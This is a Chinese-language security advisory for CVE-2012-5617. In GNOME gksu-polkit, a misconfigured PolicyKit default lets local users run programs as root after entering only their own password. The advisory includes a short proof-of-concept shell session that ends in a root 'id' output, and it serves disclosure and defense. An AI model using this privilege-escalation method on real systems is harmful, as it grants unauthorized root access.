polkit policykit配置文件身份验证设置权限提升漏洞

发布日期:2012-12-12
更新日期:2012-12-14

受影响系统:
GNOME gksu-polkit
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56918
CVE(CAN) ID: CVE-2012-5617

gksu-polkit是一个库和命令行工具,可以以root权限运行程序。

gksu-polkit所带的PolicyKit配置文件允许用户以管理员权限执行程序,因为默认的allow_active设置是"auth_self",而不是"auth_admin",任何本地用户可利用此漏洞以root权限执行任意程序。

<*来源:Miroslav Trmac
 
  链接:https://launchpad.net/Ubuntu/+source/gksu-polkit
        https://bugzilla.RedHat.com/show_bug.cgi?id=883162
        https://bugzilla.redhat.com/show_bug.cgi?id=886671
        ?bug=695807
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$ cat foo.sh
#! /bin/bash
id -a
# not just gksu-polkit id -a because gksu-polkit tries to interpret the -a
# this prompts for user's password only
$ gksu-polkit /home/user/foo.sh
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

建议:
--------------------------------------------------------------------------------
厂商补丁:

GNOME
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://live.gnome.org/gksu

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wydwyw.html